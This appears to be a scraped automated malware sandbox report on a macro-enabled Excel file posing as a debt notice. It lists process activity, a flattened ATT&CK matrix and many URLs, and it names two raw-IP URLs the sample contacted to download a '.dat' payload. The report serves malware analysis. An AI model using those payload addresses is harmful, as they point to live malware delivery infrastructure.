Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution12Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting32LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Extra Window Memory Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Outstanding-Debt-1840996632-05042021.xlsm4%ReversingLabsDocument-Office.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://185.183.99.115/44313,6048108796.dat0%Avira URL Cloudsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
http://51.89.73.159/44313,6048108796.dat0%Avira URL Cloudsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.183.99.115/44313,6048108796.datfalse
  • Avira URL Cloud: safe
unknown
http://51.89.73.159/44313,6048108796.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
    high
    https://login.microsoftonline.com/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
      high
      https://shell.suite.office.com:1443FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
          high
          https://autodiscover-s.outlook.com/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
              high
              https://cdn.entity.FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                    high
                    https://powerlift.acompli.netFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                      high
                      https://cortana.aiFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                high
                                https://api.aadrm.com/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                      high
                                      https://cr.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                            high
                                            https://graph.ppe.windows.netFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                            high
                                                            https://graph.windows.netFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                high
                                                                                                https://api.office.netFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/importsFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/macFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.aiFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.comFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesFAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.FAE18253-8CFD-4E3D-BC35-FFFD7833E115.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
